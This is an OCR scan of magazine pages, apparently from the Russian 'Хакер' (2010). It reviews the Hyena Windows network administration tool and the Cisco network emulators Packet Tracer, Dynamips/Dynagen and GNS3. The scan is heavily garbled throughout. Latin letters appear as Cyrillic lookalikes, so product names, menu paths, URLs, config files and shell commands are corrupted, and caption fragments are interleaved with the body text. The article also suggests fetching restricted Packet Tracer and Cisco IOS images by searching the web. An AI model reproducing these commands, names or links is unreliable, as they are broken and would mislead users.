неудобно. Теперь в этом уже нет необходи- 
мости, так как одно из главных нововведений 
в восьмерке - возможность подключения к 
удаленному компьютеру по этим протоко- 
лам. Чтобы такая функция была доступна, во 
время установки следует отметить дополни- 
тельный компонент Кетоне Сопнгоі Мапа^ег 
(5ТКСМ, его можно скачать отдельно 
зѵзііетшоіз.сот/зітст, распространяется как 
ітееѵѵаге) . 

Нельзя оставить без внимания еще один не- 
маловажный момент: лицензирование Нуепа 
производится в зависимости от количества 
администраторов, которые будут активно 
использовать продукт. Количество рабочих 
станций и серверов, управляемых с его по- 
мощью, на стоимость лицензии не влияет. На 
сайте доступна полнофункциональная демка, 
которая будет работать в течение 30 дней. 

В этот период предлагается и бесплатная 
поддержка продукта. 

Установка стандартна, несколько раз нажи- 
маем Иех* - и все. Вообще, возможны два ва- 
рианта использования Нуепа. Обычно прогу 
ставят на рабочем месте админа, откуда он 
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управляет всеми настройками систем, входящих в один или несколь- 
ко доменов. Но возможен вариант установки Нуепа в качестве сер- 
виса на сервере. К нему уже нужно будет подключаться при помощи 
одной из программ удаленного доступа и далее управлять как самим 
локальным сервером, на котором установлена Нуепа, так и остальны- 
ми системами сети. Учитывая, что сервер обычно включен в режиме 
24/7, соответственно, Нуепа тоже всегда будет доступна. 

Теперь познакомимся с некоторыми особенностями программы. 

ПЕРВОНАЧАЛЬНЫЕ НАСТРОЙКИ 

При первом запуске программа собирает все данные о локальной сис- 
теме и подключается к домену, в который входит компьютер, откуда 
автоматом импортируется информация обо всех объектах (учетные 
данные, группы и пользователи, сервисы, устройства и так далее) . 
Возможно, некоторое время придется подождать, по окончании все 
найденные объекты будут выведены в окне программы в виде дерева. 
Если доменная структура не используется, остальные системы можно 
найти, зайдя во вкладку Епііегргізе и выбрав один из подпунктов - сеть 
\Уіпсіоѵѵ5 Ыеі:ѵ\гогк (5МВ) или службы терминалов ѴѴіпсІоѵѵз. 

В том случае, когда в локальной сети работает несколько доменов, 
настройками которых нужно управлять, остальные следует добавить 
в список Нуепа вручную. Это можно сделать через Еііе - Асій Эотаіп; 
в появившемся окне вводим название домена. Автоматический 
поиск, активируемый через Еіпсі А11 Эотаіп, упрощает работу - все 
найденные домены затем будут автоматически добавлены в список. 
Для уточнения настроек обычно сразу вызывается конфигуратор 
объектов Оіцесі: Мапа^ег СопЯ^игагіоп, в котором при необходимости 
редактируем объекты. Добавить домен в список можно, вызвав кон- 
фигуратор напрямую: Еііе -Мапа^е ОІДещѴіеѵѵ, заполняем все поля 
внизу вкладки ОІДесЩ, нажимаем АсЫ и выбираем в списке ѴѴіпсІоѵѵз 
Ботаіп. При помощи этого же меню подключаем и многие другие 
объекты, которые не были найдены программой автоматически: 
компьютеры, 011, группы, принтеры, ІЖЬ, ветки реестра и т.д. 

ОСНОВНОЕ КОНФИГУРИРОВАНИЕ 

При щелчке на любом объекте отображаются все доступные свойства 
и параметры, которые можно просмотреть и изменить. Для сортиров- 
ки элементов в таблицах просто щелкаем по заголовку. Например, 
выбрав группу или пользователей, мы можем выполнять практи- 



чески любые административные операции: создавать, удалять, 
копировать в локальную и удаленную систему, просматривать и ре- 
дактировать свойства учетных записей и групп (локальной системы 
и домена) . Работа упрощается тем, что во всех настройках помогает 
визард, в окне которого надо лишь заполнить несколько параметров. 
Кроме того, выбранному пользователю можно отправить сооб- 
щение, сбросить пароль, отключить или разблокировать учетную 
запись. Практически все подобные действия можно произвести и в 
отношении групп. Отдельные пункты меню позволяют отслеживать 
активность пользователей (доступна информация о регистрации и 
подключениях) , поэтому мы всегда можем узнать, кто когда пришел 
на работу и где лазил в локалке. 

Найденные прогой принтеры (как локальные, так и сетевые) отоб- 
ражаются в меню Ргіпііегз. Выбрав нужный из списка, мы можем 
получить все сведения о заданиях, доступности, подключиться к 
нему, изменить свойства и приостановить/продолжить отдельное 
или все задания. 

Следующие интересные возможности: полноценное управление 
локальными и сетевыми каталогами и файлами. Открыв нужный 
ресурс, мы можем увидеть содержимое, отредактировать параметры 
доступа (сетевого и ОТЕ5), просмотреть текущие подключения и 
сбросить любое при необходимости. 

Админу периодически нужно контролировать наличие свободного 
места на харде. В Нуепа это выполнить проще простого. Для разделов 
жесткого диска выбранного компа выводится информация о типе 
файловой системы, свободное/занятое место и так далее. При ис- 
пользовании распределенной файловой системы ЭЕ5 (ЭізтЪіЛесІ Еііе 
Зузиет) в одноименной вкладке мы увидим все доступные ресурсы и 
сможем к ним быстро подключиться. 

Управление сервисами - просмотр списка (с детальным описанием), 
вывод зависимостей, запуск/перезапуск, остановка, изменение ре- 
жима запуска - это еще одна полезная возможность Нуепа. Службы, 
отмеченные зеленым значком, выполняются, красным - остановле- 
ны. Причем программа позволяет одновременно управлять серви- 
сами на нескольких компьютерах. Аналогично сервисам отобра- 
жаются и все устройства, драйвера и обновления, установленные на 
выбранной системе. 

Администратор контролирует работу сервисов на основе собранных 
журналов событий. Для их просмотра переходим во вкладку Еѵепщ. 
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Подключаем новый объект 
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Системные события по категори- 
ям 




Нуепа позволяет оценить произ- 
водительность разных подсистем 



Для удобства отбора в Нуепа реализован 
фильтр событий Еіііег Еѵепіз по типу, дате, 
времени, учетным данным и т.д. Из контекст- 
ного меню вызывается стандартный обоз- 



жено два способа, ты можешь выбрать более 
удобный: либо воспользоваться контекстным 
меню ѴѴМІ - Ехесіле Оиегу и в окне заполнить 
ѴѴМІ С^иегу Тетріаіе Ргорегііез, либо сразу вы- 



Собственно процесс подключения прост: 
выбираем систему и пункт Кетоіе Сопігоі в 
контекстном меню. Настройки каждого под- 
ключения хранятся в отдельном КСМ-файле, 



Отдельные пункты меню позволяют 
отслеживать активность пользователей 
(доступна информация о регистрации 
и подключениях), поэтому мы всегда 
можем узнать, кто когда пришел 
на работу и где лазил в локалке. 



реватель событий ѴѴіпДоѵуз, тут же можно 
сохранить резервную копию журнала или 
очистить список событий. 

Хотя Нуепа предлагает еще один вариант: 
быстро выбрать определенные события и 
данные при помощи двух пунктов контекст- 
ного меню - Ассоипі: Роіісу и Аибп Роіісу. 
Вызываем нужный и в появившемся окне ука- 
зываем критерии аудита: срокдействия паро- 
ля, длина пароля, заблокированные учетные 
записи, доступ к сессиям и многое другое. По 
умолчанию отслеживаются не все события, 
поэтому идем в Айей! Ргореггіез и флажками 
активируем нужные. 

Также просто получить доступ к записям 
реестра локальной и удаленной системы, 
просматривать содержимое, добавлять и уда- 
лять записи, редактировать настройки, копи- 
ровать и сохранить ветку реестра в файл. 

В Нуепа используется собственная систе- 
ма мониторинга ресурсов компьютера, 
позволяющая собрать данные о производи- 
тельности системы. Во вкладке Регіотапсе 
находим семь подпунктов, которые расска- 
жут все о работе процессов, запущенных в 
системе, сети, СРИ, памяти, дисков и сервера 
в целом. Можно самостоятельно создавать 
собственные запросы и редактировать теку- 
щие настройки. 

Для тех, кто разобрался с ѴѴМІ, вероятно, 
будет полезна возможность выполнить опре- 
деленный запрос или метод. Здесь предло- 



брать нужный класс в меню ѴѴМІ раскрытого 
дерева параметров конкретной системы. 
Результат выполнения запроса выводится в 
панели справа. Кстати, при помощи ѴѴМІ из 
контекстного меню можно запустить любой 
процесс на выбранной системе (ѴѴМІ - Сгеаіе 
Ргоссезз). 

Все данные, собранные программой (сис- 
темы, учетные записи, группы, сервисы и 
т.д.), легко экспортируются в текстовый 
файл или отправляются на принтер. При 
наличии М5 Ассезз становится доступной 
функция создания отчетов с практически 
неограниченными возможностями. Для 
этого переходим в Зетп^з - Керогііп§, 
указываем путь к исполняемому файлу 
Ассезз (либо Ехсеі) и запускаем мас- 
тер создания отчетов: Тооіз - Сепегаіе 
Керогі. 

НАСТРОЙ КА 5ТВСМ 

Как уже упоминалось выше, Нуепа может 
быть использована для организации подклю- 
чения к удаленной системе. КНР-соединение 
выполняется при помощи штатной утилиты 
тзізс.ехе, вызываемой с необходимыми пара- 
метрами. Чтобы использовать ѴИС, задейст- 
вуется Кетоіе Сопігоі Мапа^ег (5ТКСМ), и 
теоретически здесь можно указать любой 
ѴЛС-клиент. К слову, 5ТКСМ распростра- 
няется свободно, а код доступен по лицензии 
СШСРЬ. 



все они находятся в каталоге, где установле- 
на Нуепа. По сути, это текстовые іпі-файлы, 
которые можно редактировать напрямую 
при помощи Блокнота. После установки 
таких файлов пять: два из них - гД.гст и гб_ 
аДтіп.гст - отвечают за КБР-соединения, а 
ѵпс*.гст представляют собой шаблоны для 
ѴЛС. 

Этот список доступен и в меню Тооіз - 
ЗеШп§5 - Кетоіе Діа1о§, где, выбрав нужную 
конфигурацию и нажав кнопку ЕсИі, также 
можно приступить к настройкам. Файл имеет 
простую структуру: 

# Описывается подключение 
[Сепегаі ] 

# Тип подключения : КБР или ѴЫС 
8о:Е0\ѵагеТуре=ѴЖ: 

# Выводить в меню 
ЕпаЫеб=1 

# Название 
МепиНате=ТідйЕѴЕГС 

# Автозапуск 
АиЕоЕхеси1іе=0 

# Список команд и параметров 
[ Ѵіечл] 

# Команда для подключения 
ѴіетлегСоттапскѵпсѵіетлег . ехе 
%сотриЕег% 

# Для КБР 

# Ѵіеѵ7егСоттапс1=тз1ізс . ехе 
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Формируем ѴѴМІ-запрос 




*Яі 4 и ИГ 



Фильтр позволяет быстро отобрать интере- 
сующие события 



Файл может содержать специфические установки (раз- 
мер экрана, количество цветов, порт подключения и т.п.) 
для каждой утилиты. 

Удобно, что КСМ-файл после редактирования можно 
просто скопировать на другие системы и не возиться с 
настройками на каждой из них. Но Нуепа поддерживает и 
сетевые ресурсы, на которых размещаются такие файлы. 
Их следует указать в настройках при помощи ".КСМ Ше 
сопЯ^игагіоп бігесшгу рагЬ", после чего требуется переза- 
пуск Нуепа. 

ДОБАВЛЕНИЕ СОБСТВЕННЫХ УТИЛИТ 

При знакомстве с возможностями Нуепа бросается 
в глаза пустой пункт СизШт Тооіз. Разработчики не 
стали ограничивать админа стандартными реше- 
ниями и оставили возможность добавить любой 
инструмент, который можно быстро вызвать из 
контекстного меню или при помощи комбинации 
Сі:г1-Р[1-9] . Настройки утилит производятся в панели 
Тооіз - 8етп§5 - Тооіз, вся введенная информация 




Настройка удаленного управления 



сохраняется в файле гоо1_стсІ$.сІаі:, который также 
можно переносить между компьютерами, чтобы не 
повторять настройки. Для удобства использования 
инструменты можно разделить на группы (субменю), 
которые создаются при помощи Ыеѵѵ- ЗиЪтепи. При 
добавлении инструмента указываем его название и 
вводим команду, которая будет выполнена при щелчке 
на пункте. В командной строке поддерживается ряд 
специальных символов: 

%3% - имя текущего сервера, с которого выпол- 
няется запрос. Некоторые команды требуют на- 
личия обратного двойного слэша "\\" , в таком 
случае в команду запуска его следует добавить 
самостоятельно ; 

%Е% - подстановка текста из активного окна, 
которое появится при выборе объекта; 

%С% - группа, в которую входит пользователь, 
выполнивший запрос; 

%НОЗТБАМЕ% - возвращает ЫЕТВІОЗ или БЫЗ-имя 
компьютера (необходимо установить флажок 
Тооіз - Зеббіпдз - Асбіѵе Бігесбогу - Бзе ББЗ 
сошрибег рабйз) ; 

%Рх% - параметры пользователя, их всего три: 
%Р1% - первый, %Р2% - второй, %РЗ% - третий; 
%Рх:ргошрб% - параметр пользователя, вводи- 
мый по запросу; 

%Рх : рготрб/РЖ>% - то же , только с вводом па- 
роля . 

ЗАКЛЮЧЕНИЕ 

Как видишь, возможностей у Нуепа очень много, и они 
покрывают все потребности среднестатистического ад- 
мина. Это понятный и хорошо продуманный инструмент, 
позволяющий централизованно и без лишних усилий 
управлять системами в локальной сети. не 




> ѵѵагпіпд 

Чтобы иметь возмож- 
ность подключаться 
кудаленной системе 
по РЮР/ѴЫС, следует 
во время установки от- 
метить Ретоіе Сопігоі 
Мападег. 




• Об основных 
способах удаленного 
управления и выпол- 
нения команд читай 
в ][ 03.201 0 в статье 
«Незримое присут- 
ствие». 

• Для работы с АО 
Нуепа использует не- 
которые инструменты 
из Р5АТ (Ретоіе 
Зегѵег Абтіпізігаііоп 
Тооіз] или 

АбтіпРак (МісгозоЙ 
АсІ т і п ізігаііоп Тооіз]. 






ПНТТР://ѴШѴѴ 

I ■ 

> Ипкз 



Сайт проекта - 

зѵзіетіооіз.сот 
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5ѴМ/АСК 



I Сергей «дгіпсіег» Ярег 



ічук дгіпгіеггазупаск.ги 



Ученье -свет 
и высокая 
зарплата 



ОБЗОР ПРОГРАММНЫХ ЭМУЛЯТОРОВ СЕТЕВОГО ОБОРУДОВАНИЯ 
СІ5С0 8У5ТЕМБ И ЛШІРЕЯ ЫЕТѴѴ0ВК5 



Чтобы научиться работать с «серьезным» сетевым оборудованием, сов- 
сем необязательно иметь тугой кошелек. Можно воспользоваться спе- 
циальными эмуляторами, полностью имитирующими нужную среду, а то 
и целые сети. 



РАСКЕТТКАСЕКТ 

Разработчик: Сізсо Зузиетз Іпс. 

ѴѴеЬ:сІ5со.сот/ѵѵеЪ/1еагпіп§/пеі:асасі/соиг5е_ 

сага1о§/РаскегТгасег.Ьгт1 

ОС: ѴѴіпйоѵѵ5ХР/ѴІ5І:а/7, Ьіпих (ЦЪипш, Ресіога) 

Лицензия: бесплатно для зарегистрированных 

преподавателей и студентов курсов. 

Умение работать с оборудованием Сізсо всегда 
являлось жирным плюсом при приеме на работу, 
однако оплатить курсы или приобрести циску 
(даже б/у) может далеко не каждый. Вероятно, 
поэтому количество кошачьих эмуляторов 
растет из года в год, и они пользуются популяр- 
ностью у админов и желающих ими стать. 
Используя эмулятор, можно самостоятельно 
подготовиться к получению сертификатов ССИА 
(Сізсо Сеггійей ИеПлгогк Аззосіаге, Сертифициро- 
ванный Сізсо Сетевой Специалист), «перепробо- 
вав» все доступные девайсы и понастраивав сеть. 
Обзор начнем с официальной разработки Сізсо 
— эмулятора Раскег Тгасеги, предлагаемого 
отделением ИеГѵѵогкіп§ Асайету, отвечающим за 
образование и подготовку различных курсов. За- 
дача программы: помочь закрепить на практике 
полученные студентом теоретические навыки. 
Для ее решения РТ обладает всем необходимым, 
позволяя «строить» сети различной сложности с 
практически неограниченным количеством уст- 
ройств. Все установки производятся при помощи 
логической диаграммы сети, для симуляции 
представлен весь спектр оборудования, выпус- 
каемого Сізсо (роутеры, свитчи, точки доступа 
и т.п.) . Можно изменять настройки объектов, 
моделировать потоки данных и многое другое. 
Поддерживается большое количество протоко- 
лов и технологий, используемых в оборудовании 
Сізсо (полный список смотри в документации на 
сайте) . Работа с оборудованием хоть и виртуаль- 
на, но выглядит так, будто приходится исполь- 



зовать реальные устройства. Можно добавлять 
платы расширения, настраивать параметры в 
командной строке или используя графический 
интерфейс. Весь процесс обмена данными 
представлен в виде диаграмм и таблиц, что по- 
могает визуально оценить текущие настройки и 
работу оборудования. Официально в свободном 
доступе РаскеГ Тгасегі: не найти, он предназначен 
только для зарегистрированных преподавателей 
и студентов курсов (его можно найти на дисках, 
прилагаемых к некоторым книжкам по цисковс- 
ким курсам) . Но — нехитрый запрос к гуглу, 
и нужная программа будет у тебя на харде. Во 
время установки никаких ключей не требуется, 
сам процесс стандартен. Все настройки произво- 
дятся в большом окне посередине. Внизу слева 
находятся группы устройств, после выбора чуть 
правее появляются сами устройства. Отмечаем 
нужное и двойным щелчком на свободном месте 
в поле посередине переносим его на карту сети. 
Поддержка йга§'п'йгор делает процесс очень 
простым, устройства затем можно двигать, 
удалять и т.п. Удобно, что РТ самостоятельно 
связывает некоторые девайсы, например, при 
появлении ѴѴігеІезз свитча к нему автоматически 
подключаются все устройства, поддерживаю- 
щие этот вид соединения. При протяжке кабеля 
выбираем порт, к которому его подключаем. 
Один из значков отвечает за автоматическое оп- 
ределение типа соединения, что ускоряет сборку 
сети на стадии изучения. Если в процессе будет 
допущена ошибка, то пользователь получает 
предупреждение с кратким описанием (напри- 
мер, нет свободного разъема) . 

Пока все настройки логической сети произво- 
дились во вкладке Ьо§іса1 ѴѴогкзрасе (Сіті + Ь) . 
Чтобы перейти к физическому устройству и 
посмотреть порядок подключения, следует 
выбрать в верхнем левом углу вкладку РЬузісаІ 



ѴѴогкзрасе (Сіті + Р) . Также РТ предоставляет 
два режима отображения работы сети: КеаШте 
Мойе (Сіті + К) и Зітиіаіііопз Мойе (Сіті+5). 
Переключение производится при помощи 
ярлыков в правом нижнем углу или горячих 
клавиш. В КеаШте сеть работает в обычном 
режиме, в режиме Зітиіаіііопз можно наблюдать 
и контролировать процессы, происходящие в 
сети (работу устройств, интервалы времени, ме- 
ханизмы передачи данных и т.д .) Мастер Асйѵііу 
ѴѴігагй поможет создать собственные учебные 
сценарии. Осталось добавить, что предусмотре- 
на работа в многопользовательском режиме, а 
также доступно несколько пособий по настройке 
Сізсо и справочная система, помогающая разо- 
браться во всех возможностях. 

ЭМУЛЯТОР 0УЫАМІР5 

Разработчик: ОрепЗоигсе 

\ѴеЪ : Ьйр : / Дѵѵѵѵѵ. ірйоѵѵ. иис . іт/іпй ех. рЬр/ 

Сізсо_7200_5іти1аі:ог 

ОС: ѴѴіпйоѵѵз 2к/ХР/Ѵіз1:а, х32/х64 Ііпих, Мае 
ОЗХ 

Лицензия: СЖІ СРЬ 

Проект Пупатірз стартовал в августе 2005 года 
как эмулятор маршрутизатора Сізсо 7200 на ПК 
и предназначался для проверки конфигурации 
перед использованием на настоящем оборудо- 
вании и для обучения. Сегодня Оупатірз может 
эмулировать и другие платформы Сізсо — серии 
3600, 3700 и 2600. Причем с выбором разных 
вариантов устройств: СРІІ (МІР564 и РошегРС) , 
КАМ (БКАМ, Раскеі: 5КАМ, 1МѴКАМ), различных 
типов карт и портов. Предусмотрена возмож- 
ность создания виртуальных мостов и комму- 
таторов. Главная особенность — эмулируемое 
устройство можно подключить к реальной сети, 
для чего один из выходов виртуального маршру- 
тизатора связывается с реальной сетевой 
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картой. Работа в режиме гипервизора позволяет распределить нагрузку на 
несколько систем, ведь 105 (ІШегпеІ: Орегагіп§ 5у$1:ет) образы полностью 
загружаются в ОЗУ и при большом количестве виртуальных систем отби- 
рают много ресурсов. 

Нужный пакет доступен в репозиториях некоторых дистрибутивов 
Ііпих. Для захвата трафика используется библиотека рсар, при установ- 
ке в ѴѴіпсіоѵѵз потребуется самостоятельно инсталлировать ѴѴіпРС АР. В 
ЦЬипш/ЭеЪіап установка проста : 

$ зибо арб-деб іпзбаІІ бупатірз 

Все параметры Эупатірз легко узнать, запустив его с ключом '-Ьеір' . По 
умолчанию эмулируется Сізсо 7206ѴХК с ЫРЕ-200 и 256 Мб ОЗУ ЭКАМ. 
Чтобы указать другую платформу, следует использовать параметр '-Р' (на- 
пример, "-Р 3600") . Дополнительный ключ Ч' позволяет «изменить» внут- 
ренности виртуального маршрутизатора (в зависимости от выбранного 
типа аргументы Ч' будут различны) . Для запуска понадобятся реальные 
105 образы Сізсо, которые не являются частью пакета, и их необходимо 
скачивать отдельно (легко находятся гуглом, в Сети доступны сборники по 
несколько гигов) . Иногда 105-образы поставляются в сжатом виде, и перед 
загрузкой их нужно распаковать : 

$ ипгір -р с7200-дбік8з-гп2 . 124-2 . Т1 .Ьіп > с7200.ітаде 

Запускаем: 

$ бупатірз с7200.ітаде 

Но в плане настроек Эупатірз не очень удобен, чтобы создать на его основе 
сеть из нескольких маршрутизаторов, придется немало потрудиться. Эту 
задачу можно облегчить при помощи Эупа§еп (бѵпауеп.огу) , который 
является текстовым фронт-эндом к Бупатірз. Используя простой файл 
описания виртуальной среды, мы можем легко соединить несколько уст- 
ройств. Главное, что все установки собраны в одном месте, имеют простой 
синтаксис и легко редактируются. 

$папоѵ_гоиІег.пеІ 

# Описание узла , на котором установлен Е)упашірз 
[Іосаібюзб] 



# Тип роутера 
[[7200]] 

# Путь к 108 -файлу 

ітаде = /Ноте/дгіпбег/ітадез/с7200 . ітаде 

# Общие параметры, в данном случае платформа и НАМ, при 
необходимости внутри роутера можно указывать специфические 
настройки 

пре = пре-400 
гаш =160 

# Первый роутер 
[ [Коибег К1] ] 

# Указываем подключение , в нашем случае интерфейс 
8егіа11/0 на К1 будет подключен к 8егіа11/0 К2 
з1/0 = К2 з1/0 

[ [Коибег К2 ] ] 

# Оставляем все по умолчанию 

Это простейший пример, чтобы понять суть настроек. В «боевом» конфиге 
может быть с десяток самых разных роутеров и конфигураций. Например, 
чтобы связать один из выходов виртуального маршрутизатора с сетевым 
интерфейсом реальной или виртуальной системы, пишем: 

з2/0 = ЖО_1іпих_ебП: ебНІ 

Сначала запускаем бупатірз в режиме гипервизора (после отладки можно 
стартануть в фоне, добавив '&') : 

$ зибо бупатірз -Н 72 00 

Сізсо Коибег Зішиіабіоп Ріабіогш (ѵегзіоп 0 . 2 . 8-КС2-ашб64 ) 
СоругідПб (с) 2005-2007 СПгізборПе Ріііоб . 

Виііб бабе: Мау 9 2009 18:06: 28 

ІЬТ: Іоабеб баЫе "шірз64з " ігошсасПе. 

ІЬТ: Іоабеб баЫе "тірз64е" іготсасПе. 

ІЬТ: Іоабеб баЫе "ррс32з" ігошсасПе. 

ІЬТ: Іоабеб баЫе "ррс32е" іготсасПе. 
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5ѴМ/АСК 




Режим имитации в Раскеі 
Тгаскег 




» ■ Ѵ“ _ 

*- Ш '* ппгжп * - И»- _ 

Раскеі Тгаскег в геаШте-режиме 




Команды йупадеп 




Настройка ШЬЕРС 



Нурегѵізог ТСР сопргоі зегѵег зРагРей 
(рогѣ 7200) . 

Теперь Бупа^еп: 

$ сіупадеп ѵ_гоиРег .пеР 

После загрузки образов (процесс будет 
выводиться в консоли, где запущен бупатірз) 
и настроек виртуальных роутеров получим 
приглашение консоли управления. Введя знак 
вопроса или Ьеір, получим справку по командам. 
Набрав «Ьеір команда», узнаем обо всех парамет- 
рах конкретной команды. Поддерживается авто- 
дополнение ввода при помощи клавиши < ТаЬ > . 
Для остановки, запуска, перезапуска, приоста- 
новки и продолжения применяем команды зСаП;, 
зшр, геіоасі, зизрепб, гезите с указанием имени 
роутера или ключа /аіі для всех устройств: 



=> геіоасі КІ 

Все команды регистрозависимы, поэтому 
нужно быть внимательнее. Просмотрим список 
работающих маршрутизаторов: 

=> Іізѣ 

Кате Туре ЗЪаЬе Зегѵег Сопзоіе 
КІ 7200 гиппіпд ІосаІЬозО : 7200 2000 
К2 7200 гиппіпд ІосаІЬозО : 7200 2001 

Теперь при помощи команды: 

$ ГеІпеГ ІосаІЬозЬ 2000 

Можем подключиться к порту, указанному в 
поле Сопзоіе. Хотя проще подключиться, указав 
имя устройства в строке приглашения Оупа§еп: 

=> -ЬеІпеО КІ 

В отдельном окне откроется терминал, в кото- 
ром уже управляем настройками. 

Несколько виртуальных маршрутизаторов 
могут нехило загрузить систему. Причем вне 
зависимости от реально выполняющейся 
работы. Это происходит потому, что Пупатірз не 
знает, когда роутер выполняет полезную работу, 
а когда находится в режиме ожидания. Команда 
ісііерс позволяет проанализировать 105-образы 
в действии и определить циклы простоя. При 
первом запуске значение не установлено: 



*** Шагпіпд: Зііагѣіпд КІ тѣЬ. по ісііе- 
рс ѵаіие 

Нужную цифирь ісИе-рс можно получить, введя 
в консоли сіупадеп команду «ісііерс имя_роу- 

тера»: 

=> ісііерс деі: КІ 

Будет выдано несколько значений, наиболее 
оптимальные отмечены знаком Далее 
выполнение команды остановится, и потре- 
буется ввести одну из цифр, соответствующих 
выбранному ісііерс. После этого его значение 
будет добавлено к выполняющемуся процессу. 
При запуске Пупатірз вручную значение ісііерс 
указывается при помощи параметра '--ісИе-рс = ', 
как вариант, в секции роутера конфига Оупа§еп 
дописываем: 

ісііерс = 0х6076а394 

Но лучше просто сохранить значение, чтобы оно 
считывалось при последующих загрузках: 

=> ісііерс заѵе КІ сІЪ 

Повторно просмотреть весь список ісііерс 
просто: 

=> ісііерс зЬоѵ7 КІ 

Все, маршрутизатор можно настраивать. 
Проект оброс несколькими субпроектами, 
делающими использование Оупа§еп более 
удобным. Например, $Д>упа§еп ( чсіѵпачеп. 5І. пер 
обеспечивает единую консоль для ввода команд 
для Пупатірз + Оупа§еп. Генератор настроек 
для Оупа§еп — сопЮупа§еп Ссосіе.еоочіе. 
сот/р /сопМупаееп) добавляет новый режим 
конфигурирования, который дает возможность 
изменять параметры Оупа§еп «налету», без 
остановки виртуальной сети. 

СИМУЛЯТОР ОЫ 53 

Разработчик: ОрепЗоигсе 
ѴѴеЬ: тѵ\ѵ.§пз3.пеі: 

ОС: ѴѴіпбоѵѵз 2к/ХР/Ѵізі:а, *піх, Мае 05 X 

Лицензия: СШ СРЬ 

СЫ53 (§гарЫса1 пеізлгогк зітиіаіюг) — очень 
мощный симулятор, выпускаемый под 



Некоторые команды 
маршрутизаторов Сізсо 

Ьеір — справка по всем командам 

$еШр — запуск мастера конфигурирования маршрутизатора 

зЬото сопй§ — просмотр текущих настроек 

сопй^иге іегтіпаі — вход в режим настройки хоста 

епаЫе [номер уровня] — переход к определенному уровню настроек 

ЬовШате Коиіег — вводим имя маршрутизатора 

ір Ьнр зегѵег — запуск веб-интерфейса 

ір гоиіе 172.1.1.0 255.255.255.0 іо.і.і.і регтапепі — статический маршрут 
сіеаг ір гоиіе * — удаление всех маршрутов 
зЬото ір гоиіе — просмотр маршрутов 

Консоль Сізсо поддерживает автодополнение с использованием табуляции, 
поэтому полностью вводить команды не обязательно. 



► 122 



ХАКЕР 07 /138/ 10 





■ ■ ѵ • * I - • ао 




Рабочее пространство 6Ы5з 




Конфигурируем виртуальный маршрути- 
затор в 6Ы5з 



Проекты одной 
строкой 

• №1лѵогк 8іти1а1ог ( І5І.е<іи/п5пат/п5) — симу- 
лятор, предназначенный для изучения работы 
сетевых протоколов и маршрутизации. Оп- 
ционально включает модуль анимации пат 
(пеіі/ѵогк апітаіог) . 

• Хепіаиг Схщі.ги /Іі% /хепіаиг) — решение для 
организации сетей, объединяющих реальные уст- 
ройства, эмуляторы и виртуальные машины Хеп. 

• №(8іт Стриі.сІе /ргоіесіа /сойе /пеізіт) — 
симулятор работы по протоколам нижнего уров- 
ня, с зБ-визуализацией процессов. 

• Ргоі$ІМ8 ( пеііѵогкзітз.сот) , Кои1:ег8іт 
Г гои1:ег5Іт.сот') . СегіЕхатз.сот 
( гоиіегзітиіаіог.сегіехатз.сот) — ком- 
мерческие симуляторы и визуализаторы, 
позволяющие подготовиться к сертифика- 
ции СІ8СО. 

свободной лицензией и позволяющий эмулировать сети 
большого размера. Полезен администраторам и инжене- 
рам, а также пользователям, которые готовятся к сдаче 
сертификатов Сізсо (ССЫА, ССЫР, ССІР, ССІЕ) и іипірег 
Ыегѵѵогкз (ЖСІА, ЖСІ5, ЖСІЕ) . Чтобы обеспечить макси- 
мальную функциональность, также следует установить 
Эупатірз, Эупа^еп и виртуальную машину Оети. Для 
захвата пакетов потребуется ѴѴігезЬагк Г ѵѵігезЬагк.ог^ . 
Кроме образов Сізсо 105, СЫ53 умеет работать с оііѵе-об- 
разами ьктОЗ (шпірег.пег/ш/ги/ргобисЩ-5егѵісе5/по5/ 
іипоз) — операционки, используемой в оборудовании 
компании ьГишрег ЫеГѵѵогкз. Возможна эмуляция простых 
ЕЛегпеЦ АТМ и Егате Кеіау свитчей и файеров (А5А, РІХ) . 
Как и в случае с Эупатірз, легко подключить виртуальный 
свитч к сетевой карте реальной или виртуальной системы. 
И главное — все настройки производятся в интуитивно 
понятной графической среде. 

Пакет СЫ53 уже доступен в репозиториях большинства ос- 
новных дистрибутивов Ьіпііх. В ЭеЪіап/Шипш для установки 
набираем: 

$ зисіо арС-деС іпзСаІІ дпзЗ 

Чтобы использовать самые свежие версии, следует подклю- 
чить репозиторий эі.собе.сіе . Подробные инструкции для 



своего дистрибутива ищи по адресу ^рі.собе.сіе/озѵѵікі/ 
СркобебеАрГ . Для самостоятельной сборки пакетов потре- 
буется наличие РугЬоп и ряда библиотек: ф, Руф и других. 
При первом запуске встречает ЗеШр ѴѴігагсі, объясняющий 
два основных требования к запуску программы: проверить 
правильность пути в Эупатірз и при необходимости скоррек- 
тировать его. Плюс загрузка 105-образов. 

Окно программы можно назвать стандартным. Слева в 'ЧЧосІез 
Турез" находятся значки устройств, которые простым перетас- 
киванием помещаем в окно посередине, строя виртуальную 
сеть. Двойным щелчком вызываем окно свойств, где настраи- 
ваются специфические параметры для конкретного роутера, 
и, в том числе, добавляются адаптеры. Контекстное меню 
позволяет запустить, остановить устройство, получить ГОЬЕ 
РС, выйти в консоль. В панели сверху доступны примитивные 
инструменты рисования (вставка круга, прямоугольника, ри- 
сунка) . Сеть, состоящая из одних маршрутизаторов, не очень 
наглядна, остальные компоненты сети (серверы, принтеры и 
т.п.) добавляются через «Ебк — 5утЪо1 Мапа§ег». 

Правое окно «Торо1о§у Зшшпагу» предназначено для быстрой 
навигации, здесь выводятся все девайсы (работающие под- 
свечиваются зеленым значком) . Если образа, соответствую- 
щего выбранному устройству, в коллекции СЫ53 нет, то при 
попытке добавить такой роутер получим предупреждение. 
Чтобы добавить 105-образы или указать местонахождение 
гипервизоров Эупатірз, открываем «ЕсІіГ — 105 іта§ез апД 
Ьурегѵізогз». Указываем на іта§е-файл, при этом платформа, 
модель и количество КАМ отображаются автоматически. 

Эти значения будут использованы по умолчанию, их можно 
скорректировать. В поле ГОЬЕ РС прописывается нужное 
значение (если оно известно) . Внизу посередине находится 
консоль Эупа§еп, предназначенная для непосредственного 
ввода команд. 

После нанесения на карту всех устройств при помощи консо- 
ли приступаем к их настройке, в частности, устанавливаем 
связи щелчком по «АДД а Нпк». Созданные настройки сохра- 
няются в файл для повторного использования. 

Стоит отметить, что имеется еще один проект — Эупа§ііі 
(Дѵпачиі.зЕпеО , наглядно показывающий подключения 
между роутерами. Но по функциональности он недотягивает 
до СЫ53, а последнее обновление датировано 2007 годом. 

ЗАКЛЮЧЕНИЕ 

Не стоит пренебрегать программными эмуляторами 
сетевого оборудования и недооценивать предлагаемые 
ими возможности, тем более, что разработчики Сізсо 
